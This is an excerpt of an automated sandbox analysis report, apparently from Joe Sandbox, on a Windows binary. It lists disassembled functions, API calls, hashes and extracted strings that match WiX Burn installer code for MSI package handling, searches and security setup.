                                                                                                                                                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: d409d72a66f43b31c093d7f9e193fbf954cdcdc702dbaf419378d5c6781b06da
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3a37ebb353e9434f8cf3b9bbaf8523fc921da4e712155f4de6512be297e916fd
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d409d72a66f43b31c093d7f9e193fbf954cdcdc702dbaf419378d5c6781b06da
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97B012922AC205BC3A8C51882E47E37092CFAC2B15731811FF151D1540ECA48C094133
                                                                                                                                                                                                                                                                                                  Function 008A9653 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008A966B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008A9A09
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008A9A1A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: ca8fb73467cb3ae09c1e1d06199a1932cf2282c2ebaa21de4f4a946fc421fb77
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3271bf847357ecc71e3384aea90bbed2024b570652a548e57957b41b3681ca59
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca8fb73467cb3ae09c1e1d06199a1932cf2282c2ebaa21de4f4a946fc421fb77
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F3B012D22AC109BC3A4C11446C87D37092CFAC2B15731C11FF151E0440ACA08C084233
                                                                                                                                                                                                                                                                                                  Function 008A9674 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008A966B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008A9A09
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008A9A1A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4120fcffade4ed64f5cda90cbaa88fab09cb145b5ca1fdd3e33156ced1cbc892
                                                                                                                                                                                                                                                                                                  • Instruction ID: 8b1366445cadb797a29ae1d54d0d0aa66b0d791dcc8dade29a7c14e3635234a7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4120fcffade4ed64f5cda90cbaa88fab09cb145b5ca1fdd3e33156ced1cbc892
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ADB012922AC006BC364C51481C07E37092CF6C2B15331C21FF551C1540ECA08C0C4133
                                                                                                                                                                                                                                                                                                  Function 008614B6 Relevance: 1.3, APIs: 1, Instructions: 57stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,008621A8,?,00000000,?,00000000,?,0086390C,00000000,?,00000104), ref: 008614E8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,008621CC,000001C7,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863BDB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863BD3: HeapSize.KERNEL32(00000000,?,008621CC,000001C7,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863BE2
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$ProcessSizelstrlen
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3492610842-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 27aad52ad402ddda693ba1f54d2fb7a322067ab3bbcd8bf9fdf8255b594310a7
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5fc28bff286fd0c6c6456e71745b85e33433d431515f0dbb3d74ab7b34864c15
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 27aad52ad402ddda693ba1f54d2fb7a322067ab3bbcd8bf9fdf8255b594310a7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8101D63320022DABCF115E54DC8CF9AB766FF84764F1A4215FA17DB153DA319C008695

                                                                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                                                                  Function 0086A8F1 Relevance: 170.4, APIs: 29, Strings: 68, Instructions: 688COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 0086B11C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,008ACA9C,000000FF,DirectorySearch,000000FF,008ACA9C,Condition,feclient.dll,008ACA9C,Variable,?,008ACA9C,008ACA9C,?,?), ref: 0086AA29
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Type,?,?,Path,clbcatq.dll), ref: 0086AA7E
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,path,000000FF), ref: 0086AA9A
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,FileSearch,000000FF), ref: 0086AABE
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Type,?,?,Path,clbcatq.dll), ref: 0086AB11
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 0086AB2B
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,RegistrySearch,000000FF), ref: 0086AB53
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKCR,000000FF,?,Root,?), ref: 0086AB91
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKCU,000000FF), ref: 0086ABB0
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKLM,000000FF), ref: 0086ABCF
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Win64,msi.dll,?,Type,?,?,Value,version.dll,?), ref: 0086AC8D
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,value,000000FF), ref: 0086ACA7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A32F3: VariantInit.OLEAUT32(?), ref: 008A3309
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A32F3: SysAllocString.OLEAUT32(?), ref: 008A3325
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A32F3: VariantClear.OLEAUT32(?), ref: 008A33AC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A32F3: SysFreeString.OLEAUT32(00000000), ref: 008A33B7
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,numeric,000000FF,?,VariableType,?,?,ExpandEnvironment,cabinet.dll), ref: 0086AD06
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,string,000000FF), ref: 0086AD28
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 0086AD48
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,directory,000000FF), ref: 0086AE20
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 0086AFFE
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$Compare$Free$HeapVariant$AllocAllocateClearInitProcess
                                                                                                                                                                                                                                                                                                  • String ID: ComponentId$Condition$DirectorySearch$DirectorySearch|FileSearch|RegistrySearch|MsiComponentSearch|MsiProductSearch|MsiFeatureSearch$ExpandEnvironment$Failed to allocate memory for search structs.$Failed to get @ComponentId.$Failed to get @Condition.$Failed to get @ExpandEnvironment.$Failed to get @FeatureId.$Failed to get @Id.$Failed to get @Path.$Failed to get @ProductCode or @UpgradeCode.$Failed to get @ProductCode.$Failed to get @Root.$Failed to get @Type.$Failed to get @UpgradeCode.$Failed to get @Variable.$Failed to get @VariableType.$Failed to get Key attribute.$Failed to get Value attribute.$Failed to get Win64 attribute.$Failed to get next node.$Failed to get search node count.$Failed to select search nodes.$FeatureId$FileSearch$HKCR$HKCU$HKLM$HKU$Invalid value for @Root: %ls$Invalid value for @Type: %ls$Invalid value for @VariableType: %ls$Key$MsiComponentSearch$MsiFeatureSearch$MsiProductSearch$Path$ProductCode$RegistrySearch$Root$Type$Unexpected element name: %ls$UpgradeCode$Value$Variable$VariableType$Win64$assignment$cabinet.dll$clbcatq.dll$comres.dll$directory$exists$feclient.dll$keyPath$language$msi.dll$numeric$path$search.cpp$state$string$value$version$version.dll$wininet.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 2748437055-1695159631
                                                                                                                                                                                                                                                                                                  • Opcode ID: 79c5f7fac08e5704388edbb9a1a23dffcad129d9049d72fd15b1e4909d9d27c8
                                                                                                                                                                                                                                                                                                  • Instruction ID: 65c00d8f619813a7acb602a3095b431f5a33bda46837932ac6f3c97c60c8441c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 79c5f7fac08e5704388edbb9a1a23dffcad129d9049d72fd15b1e4909d9d27c8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A222B931D4862ABAEB259A948C42F6E7E64FF06734F210710F530F66D0DBB59D40DB92
                                                                                                                                                                                                                                                                                                  Function 008841EA Relevance: 43.0, Strings: 34, Instructions: 498COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to add patch properties to argument string., xrefs: 008844FD
                                                                                                                                                                                                                                                                                                  • Failed to get cached path for package: %ls, xrefs: 0088434F
                                                                                                                                                                                                                                                                                                  • Failed to install MSI package., xrefs: 00884746
                                                                                                                                                                                                                                                                                                  • Failed to add feature action properties to argument string., xrefs: 008844B9
                                                                                                                                                                                                                                                                                                  • Failed to perform minor upgrade of MSI package., xrefs: 00884638
                                                                                                                                                                                                                                                                                                  • REINSTALL=ALL, xrefs: 008845D3, 0088464D
                                                                                                                                                                                                                                                                                                  • IGNOREDEPENDENCIES, xrefs: 008846A5, 00884784
                                                                                                                                                                                                                                                                                                  • Failed to add reboot suppression property on install., xrefs: 008845BB
                                                                                                                                                                                                                                                                                                  • VersionString, xrefs: 0088428E, 008842EF
                                                                                                                                                                                                                                                                                                  • REINSTALLMODE="vomus" REBOOT=ReallySuppress, xrefs: 008845F5
                                                                                                                                                                                                                                                                                                  • Failed to add feature action properties to obfuscated argument string., xrefs: 008844DB
                                                                                                                                                                                                                                                                                                  • crypt32.dll, xrefs: 0088440A
                                                                                                                                                                                                                                                                                                  • feclient.dll, xrefs: 008842C5, 0088434D, 0088441D, 0088454B, 008847D8
                                                                                                                                                                                                                                                                                                  • Failed to add reboot suppression property on uninstall., xrefs: 0088477D
                                                                                                                                                                                                                                                                                                  • msasn1.dll, xrefs: 0088440B
                                                                                                                                                                                                                                                                                                  • Failed to run maintanance mode for MSI package., xrefs: 008846F6
                                                                                                                                                                                                                                                                                                  • Failed to add ADMIN property on admin install., xrefs: 0088471E
                                                                                                                                                                                                                                                                                                  • WixBundleExecutePackageAction, xrefs: 008843B7, 008848B4
                                                                                                                                                                                                                                                                                                  • %ls %ls=ALL, xrefs: 008846B6, 00884795
                                                                                                                                                                                                                                                                                                  • Failed to add patch properties to obfuscated argument string., xrefs: 0088451F
                                                                                                                                                                                                                                                                                                  • REBOOT=ReallySuppress, xrefs: 008845A0, 0088476C
                                                                                                                                                                                                                                                                                                  • Failed to add reinstall mode and reboot suppression properties on repair., xrefs: 0088469B
                                                                                                                                                                                                                                                                                                  • Failed to add the list of dependencies to ignore to the properties., xrefs: 008846CA
                                                                                                                                                                                                                                                                                                  • Failed to add obfuscated properties to argument string., xrefs: 00884497
                                                                                                                                                                                                                                                                                                  • Failed to build MSI path., xrefs: 0088439D
                                                                                                                                                                                                                                                                                                  • Failed to uninstall MSI package., xrefs: 008847EF
                                                                                                                                                                                                                                                                                                  • WixBundleExecutePackageCacheFolder, xrefs: 0088436A, 008848A4
                                                                                                                                                                                                                                                                                                  • Failed to add properties to argument string., xrefs: 00884463
                                                                                                                                                                                                                                                                                                  • Failed to add reinstall all property on minor upgrade., xrefs: 008845EA
                                                                                                                                                                                                                                                                                                  • ACTION=ADMIN, xrefs: 00884709
                                                                                                                                                                                                                                                                                                  • Failed to initialize external UI handler., xrefs: 008843F4
                                                                                                                                                                                                                                                                                                  • %ls%ls REINSTALLMODE="cmus%ls" REBOOT=ReallySuppress, xrefs: 00884687
                                                                                                                                                                                                                                                                                                  • Failed to add reinstall mode and reboot suppression properties on minor upgrade., xrefs: 0088460C
                                                                                                                                                                                                                                                                                                  • Failed to enable logging for package: %ls to: %ls, xrefs: 0088441F
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID: ACTION=ADMIN$ REBOOT=ReallySuppress$ REINSTALL=ALL$ REINSTALLMODE="vomus" REBOOT=ReallySuppress$%ls %ls=ALL$%ls%ls REINSTALLMODE="cmus%ls" REBOOT=ReallySuppress$Failed to add ADMIN property on admin install.$Failed to add feature action properties to argument string.$Failed to add feature action properties to obfuscated argument string.$Failed to add obfuscated properties to argument string.$Failed to add patch properties to argument string.$Failed to add patch properties to obfuscated argument string.$Failed to add properties to argument string.$Failed to add reboot suppression property on install.$Failed to add reboot suppression property on uninstall.$Failed to add reinstall all property on minor upgrade.$Failed to add reinstall mode and reboot suppression properties on minor upgrade.$Failed to add reinstall mode and reboot suppression properties on repair.$Failed to add the list of dependencies to ignore to the properties.$Failed to build MSI path.$Failed to enable logging for package: %ls to: %ls$Failed to get cached path for package: %ls$Failed to initialize external UI handler.$Failed to install MSI package.$Failed to perform minor upgrade of MSI package.$Failed to run maintanance mode for MSI package.$Failed to uninstall MSI package.$IGNOREDEPENDENCIES$VersionString$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$crypt32.dll$feclient.dll$msasn1.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 0-2033600224
                                                                                                                                                                                                                                                                                                  • Opcode ID: 21dd1cfb258a82eed1c7400a6c5a4554285c9dd9a38e7b44517f5c6d7373133a
                                                                                                                                                                                                                                                                                                  • Instruction ID: 260f6707955e12ba6dcf9ced71b649195a6a5829b022c370a1f3a34f3cc5630c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21dd1cfb258a82eed1c7400a6c5a4554285c9dd9a38e7b44517f5c6d7373133a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C02C07290062AAFDB21AF58CC41FA9B76AFF55710F0001A5F918E7711D772EEA0CB81
                                                                                                                                                                                                                                                                                                  Function 008A1719 Relevance: 38.8, APIs: 21, Strings: 1, Instructions: 337COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 008A17B1
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008A17BB
                                                                                                                                                                                                                                                                                                  • CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 008A1808
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008A180E
                                                                                                                                                                                                                                                                                                  • CreateWellKnownSid.ADVAPI32(00000017,00000000,?,?), ref: 008A1848
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008A184E
                                                                                                                                                                                                                                                                                                  • CreateWellKnownSid.ADVAPI32(00000018,00000000,?,?), ref: 008A188E
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008A1894
                                                                                                                                                                                                                                                                                                  • CreateWellKnownSid.ADVAPI32(00000010,00000000,?,?), ref: 008A18D4
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008A18DA
                                                                                                                                                                                                                                                                                                  • CreateWellKnownSid.ADVAPI32(00000016,00000000,?,?), ref: 008A191A
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008A1920
                                                                                                                                                                                                                                                                                                  • SetEntriesInAclA.ADVAPI32(00000005,?,00000000,?), ref: 008A1A11
                                                                                                                                                                                                                                                                                                  • SetSecurityDescriptorOwner.ADVAPI32(?,?,00000000), ref: 008A1A4B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008A1A55
                                                                                                                                                                                                                                                                                                  • SetSecurityDescriptorGroup.ADVAPI32(?,?,00000000), ref: 008A1A8D
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008A1A97
                                                                                                                                                                                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008A1AD0
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008A1ADA
                                                                                                                                                                                                                                                                                                  • CoInitializeSecurity.OLE32(?,000000FF,00000000,00000000,00000006,00000002,00000000,00003000,00000000), ref: 008A1B18
                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 008A1B2E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CreateKnownSecurityWell$Descriptor$Initialize$DaclEntriesFreeGroupLocalOwner
                                                                                                                                                                                                                                                                                                  • String ID: srputil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 267631441-4105181634
                                                                                                                                                                                                                                                                                                  • Opcode ID: 87f66e67b0bdee2c2741a3ec89da70b9c10bba5f9744e0046d1f332eefbdd0d0
                                                                                                                                                                                                                                                                                                  • Instruction ID: 53dced563e57a6dbce8fc1fbb26adebd90314b2c2781ffc1a0b2307ae322a1fa
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 87f66e67b0bdee2c2741a3ec89da70b9c10bba5f9744e0046d1f332eefbdd0d0
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7EC15376D4123DABEB208F958C48BDFFAB8FF45750F0141AAA914F7641E7749E408EA0
                                                                                                                                                                                                                                                                                                  Function 0088C332 Relevance: 37.1, APIs: 1, Strings: 20, Instructions: 376COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to copy download source for pseudo bundle., xrefs: 0088C469
                                                                                                                                                                                                                                                                                                  • Failed to copy filename for pseudo bundle., xrefs: 0088C417
                                                                                                                                                                                                                                                                                                  • Failed to copy install arguments for related bundle package, xrefs: 0088C584
                                                                                                                                                                                                                                                                                                  • Failed to copy cache id for pseudo bundle., xrefs: 0088C55F
                                                                                                                                                                                                                                                                                                  • Failed to copy local source path for pseudo bundle., xrefs: 0088C43B
                                                                                                                                                                                                                                                                                                  • Failed to append relation type to uninstall arguments for related bundle package, xrefs: 0088C644
                                                                                                                                                                                                                                                                                                  • Failed to allocate memory for pseudo bundle payload hash., xrefs: 0088C4AD
                                                                                                                                                                                                                                                                                                  • Failed to copy version for pseudo bundle., xrefs: 0088C72D
                                                                                                                                                                                                                                                                                                  • Failed to allocate space for burn payload inside of related bundle struct, xrefs: 0088C3BE
                                                                                                                                                                                                                                                                                                  • -%ls, xrefs: 0088C34C
                                                                                                                                                                                                                                                                                                  • Failed to copy repair arguments for related bundle package, xrefs: 0088C5D0
                                                                                                                                                                                                                                                                                                  • Failed to append relation type to repair arguments for related bundle package, xrefs: 0088C5F1
                                                                                                                                                                                                                                                                                                  • Failed to copy key for pseudo bundle., xrefs: 0088C542
                                                                                                                                                                                                                                                                                                  • Failed to allocate space for burn package payload inside of related bundle struct, xrefs: 0088C385
                                                                                                                                                                                                                                                                                                  • Failed to copy key for pseudo bundle payload., xrefs: 0088C3F3
                                                                                                                                                                                                                                                                                                  • Failed to allocate memory for dependency providers., xrefs: 0088C6DE
                                                                                                                                                                                                                                                                                                  • pseudobundle.cpp, xrefs: 0088C379, 0088C3B2, 0088C4A1, 0088C6D2
                                                                                                                                                                                                                                                                                                  • Failed to append relation type to install arguments for related bundle package, xrefs: 0088C5A9
                                                                                                                                                                                                                                                                                                  • Failed to copy uninstall arguments for related bundle package, xrefs: 0088C623
                                                                                                                                                                                                                                                                                                  • Failed to copy display name for pseudo bundle., xrefs: 0088C74F
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
